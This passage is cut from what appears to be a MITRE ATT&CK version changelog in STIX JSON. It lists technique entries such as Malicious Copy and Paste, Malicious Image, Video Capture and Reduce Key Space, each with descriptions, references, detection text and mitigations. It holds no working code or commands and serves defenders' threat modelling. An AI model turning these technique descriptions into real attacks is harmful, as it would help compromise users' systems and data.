Retrieved October 13, 2018.", + "url": "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Flow" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network Devices" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:21.421000+00:00\", \"old_value\": \"2025-04-15 19:58:49.044000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1037: Filter Network Traffic" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--e261a979-f354-41a8-963e-6cadac27c4bf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2025-03-18 12:57:50.188000+00:00", + "modified": "2025-04-30 17:53:48.667000+00:00", + "name": "Malicious Copy and Paste", + "description": "An adversary may rely upon a user copying and pasting code in order to gain execution. 
Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). \n\nMalicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citation: AhnLab LummaC2 2025)\n\nAdversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution.(Citation: Proofpoint ClickFix 2024)(Citation: AhnLab Malicioys Copy Paste 2024)\n\nTricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1204/004", + "external_id": "T1204.004" + }, + { + "source_name": "AhnLab Malicioys Copy Paste 2024", + "description": "AhnLab SEcurity intelligence Center. (2024, May 23). Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V). Retrieved April 23, 2025.", + "url": "https://asec.ahnlab.com/en/73952/" + }, + { + "source_name": "AhnLab LummaC2 2025", + "description": "AhnLab SEcurity intelligence Center. (2025, January 8). 
Infostealer LummaC2 Spreading Through Fake CAPTCHA Verification Page. Retrieved April 23, 2025.", + "url": "https://asec.ahnlab.com/en/85699/" + }, + { + "source_name": "Reliaquest CAPTCHA 2024", + "description": "Alex Capraro. (2024, December 17). Using CAPTCHA for Compromise: Hackers Flip the Script. Retrieved March 18, 2025.", + "url": "https://www.reliaquest.com/blog/using-captcha-for-compromise/" + }, + { + "source_name": "Sekoia ClickFake 2025", + "description": "Amaury G., Coline Chavane, Felix Aim\u00e9 and Sekoia TDR. (2025, March 31). From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic. Retrieved April 1, 2025.", + "url": "https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/" + }, + { + "source_name": "CloudSEK Lumma Stealer 2024", + "description": "CloudSEK TRIAD. (2024, September 19). Unmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages. Retrieved March 18, 2025.", + "url": "https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages" + }, + { + "source_name": "Proofpoint ClickFix 2024", + "description": "Tommy Madjar, Selena Larson and The Proofpoint Threat Research Team. (2024, November 18). Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape. 
Retrieved March 18, 2025.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ale Houspanossian", + "Fernando Bacchin", + "Gabriel Currie", + "Harikrishnan Muthu, Cyble", + "Menachem Goldstein", + "ReliaQuest", + "SeungYoul Yoo, Ahn Lab" + ], + "x_mitre_data_sources": [ + "File: File Creation", + "Network Traffic: Network Traffic Content", + "Command: Command Execution", + "Process: Process Creation", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_remote_support": false, + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-30 17:53:48.667000+00:00\", \"old_value\": \"2025-04-15 19:59:15.487000+00:00\"}, \"root['description']\": {\"new_value\": \"An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). \\n\\nMalicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. 
Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citation: AhnLab LummaC2 2025)\\n\\nAdversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution.(Citation: Proofpoint ClickFix 2024)(Citation: AhnLab Malicioys Copy Paste 2024)\\n\\nTricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files. \", \"old_value\": \"An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). \\n\\nMalicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)\\n\\nAdversaries may also leverage phishing emails for this purpose. 
When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution.(Citation: Proofpoint ClickFix 2024) \\n\\nTricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files. \", \"diff\": \"--- \\n+++ \\n@@ -1,7 +1,7 @@\\n An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). \\n \\n-Malicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)\\n+Malicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citation: AhnLab LummaC2 2025)\\n \\n-Adversaries may also leverage phishing emails for this purpose. 
When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution.(Citation: Proofpoint ClickFix 2024) \\n+Adversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution.(Citation: Proofpoint ClickFix 2024)(Citation: AhnLab Malicioys Copy Paste 2024)\\n \\n Tricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files. \"}, \"root['x_mitre_contributors'][6]\": {\"new_value\": \"SeungYoul Yoo, Ahn Lab\", \"old_value\": \"seungyoul.yoo@ahnlab.com\"}}, \"iterable_item_added\": {\"root['external_references'][1]\": {\"source_name\": \"AhnLab Malicioys Copy Paste 2024\", \"description\": \"AhnLab SEcurity intelligence Center. (2024, May 23). Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V). Retrieved April 23, 2025.\", \"url\": \"https://asec.ahnlab.com/en/73952/\"}, \"root['external_references'][2]\": {\"source_name\": \"AhnLab LummaC2 2025\", \"description\": \"AhnLab SEcurity intelligence Center. (2025, January 8). Infostealer LummaC2 Spreading Through Fake CAPTCHA Verification Page. Retrieved April 23, 2025.\", \"url\": \"https://asec.ahnlab.com/en/85699/\"}}}", + "previous_version": "1.0", + "description_change_table": "\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n

Old Description
New Description
t1An adversary may rely upon a user copying and pasting code it1An adversary may rely upon a user copying and pasting code i
>n order to gain execution. Users may be subjected to social >n order to gain execution. Users may be subjected to social 
>engineering to get them to copy and paste code directly into>engineering to get them to copy and paste code directly into
> a [Command and Scripting Interpreter](https://attack.mitre.> a [Command and Scripting Interpreter](https://attack.mitre.
>org/techniques/T1059).    Malicious websites, such as those >org/techniques/T1059).    Malicious websites, such as those 
>used in [Drive-by Compromise](https://attack.mitre.org/techn>used in [Drive-by Compromise](https://attack.mitre.org/techn
>iques/T1189), may present fake error messages or CAPTCHA pro>iques/T1189), may present fake error messages or CAPTCHA pro
>mpts that instruct users to open a terminal or the Windows R>mpts that instruct users to open a terminal or the Windows R
>un Dialog box and execute an arbitrary command. These comman>un Dialog box and execute an arbitrary command. These comman
>ds may be obfuscated using encoding or other techniques to c>ds may be obfuscated using encoding or other techniques to c
>onceal malicious intent. Once executed, the adversary will t>onceal malicious intent. Once executed, the adversary will t
>ypically be able to establish a foothold on the victim's mac>ypically be able to establish a foothold on the victim's mac
>hine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoi>hine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoi
>a ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)  Advers>a ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citatio
>aries may also leverage phishing emails for this purpose. Wh>n: AhnLab LummaC2 2025)  Adversaries may also leverage phish
>en a user attempts to open an attachment, they may be presen>ing emails for this purpose. When a user attempts to open an
>ted with a fake error and offered a malicious command to pas> attachment, they may be presented with a fake error and off
>te as a solution.(Citation: Proofpoint ClickFix 2024)   Tric>ered a malicious command to paste as a solution.(Citation: P
>king a user into executing a command themselves may help to >roofpoint ClickFix 2024)(Citation: AhnLab Malicioys Copy Pas
>bypass email filtering, browser sandboxing, or other mitigat>te 2024)  Tricking a user into executing a command themselve
>ions designed to protect users against malicious downloaded >s may help to bypass email filtering, browser sandboxing, or
>files. > other mitigations designed to protect users against malicio
 >us downloaded files. 
", + "changelog_mitigations": { + "shared": [ + "M1021: Restrict Web-Based Content", + "M1031: Network Intrusion Prevention", + "M1038: Execution Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)", + "DS0022: File (File Creation)", + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--b0c74ef9-c61e-4986-88cb-78da98a355ec", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-30 17:20:05.789000+00:00", + "modified": "2025-04-25 14:47:40.745000+00:00", + "name": "Malicious Image", + "description": "Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. 
This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)\n\nAdversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Resource Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1204/003", + "external_id": "T1204.003" + }, + { + "source_name": "Summit Route Malicious AMIs", + "description": "Piper, S.. (2018, September 24). Investigating Malicious AMIs. Retrieved March 30, 2021.", + "url": "https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/" + }, + { + "source_name": "Aqua Security Cloud Native Threat Report June 2021", + "description": "Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. 
Retrieved August 26, 2021.", + "url": "https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Vishwas Manral, McAfee" + ], + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Command: Command Execution", + "Image: Image Creation", + "Container: Container Start", + "Container: Container Creation", + "Instance: Instance Start", + "Instance: Instance Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor the local image registry to make sure malicious images are not added. Track the deployment of new containers, especially from newly built images. 
Monitor the behavior of containers within the environment to detect anomalous behavior or malicious activity after users deploy from malicious images.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "Containers" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:40.745000+00:00\", \"old_value\": \"2025-04-15 19:58:58.109000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1017: User Training", + "M1031: Network Intrusion Prevention", + "M1045: Code Signing", + "M1047: Audit" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0007: Image (Image Creation)", + "DS0015: Application Log (Application Log Content)", + "DS0017: Command (Command Execution)", + "DS0030: Instance (Instance Creation)", + "DS0030: Instance (Instance Start)", + "DS0032: Container (Container Creation)", + "DS0032: Container (Container Start)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:37.917000+00:00", + "modified": "2025-04-25 15:15:42.332000+00:00", + "name": "Video Capture", + "description": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. 
Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.\n\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1125", + "external_id": "T1125" + }, + { + "source_name": "objective-see 2017 review", + "description": "Patrick Wardle. (n.d.). Retrieved March 20, 2018.", + "url": "https://objective-see.com/blog/blog_0x25.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_data_sources": [ + "Process: OS API Execution", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection of this technique may be difficult due to the various APIs that may be used. 
Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:42.332000+00:00\", \"old_value\": \"2025-04-16 20:37:17.864000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0017: Command (Command Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-19 18:47:08.759000+00:00", + "modified": "2025-04-25 15:15:15.040000+00:00", + "name": "Weaken Encryption", + "description": "Adversaries may compromise a network device\u2019s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)\n\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). 
Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\n\nAdversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device\u2019s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1600", + "external_id": "T1600" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. 
Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "There is no documented method for defenders to directly identify behaviors that weaken encryption. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). Some detection methods require vendor support to aid in investigation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:15.040000+00:00\", \"old_value\": \"2025-04-15 19:58:12.571000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-19 19:11:18.757000+00:00", + "modified": "2025-04-25 14:47:14.891000+00:00", + "name": "Disable Crypto Hardware", + "description": "Adversaries disable a network device\u2019s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted 
data.\n\nMany network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1600/002", + "external_id": "T1600.002" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). 
Some detection methods require vendor support to aid in investigation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:14.891000+00:00\", \"old_value\": \"2025-04-15 19:58:45.787000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-19 19:03:48.310000+00:00", + "modified": "2025-04-25 14:46:24.048000+00:00", + "name": "Reduce Key Space", + "description": "Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)\n\nAdversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.\n\nAdversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. 
(Citation: Cisco Blog Legacy Device Attacks)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1600/001", + "external_id": "T1600.001" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). 
Some detection methods require vendor support to aid in investigation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:24.048000+00:00\", \"old_value\": \"2025-04-15 19:58:23.689000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-14 22:34:03.024000+00:00", + "modified": "2025-04-25 14:47:51.598000+00:00", + "name": "Bidirectional Communication", + "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. 
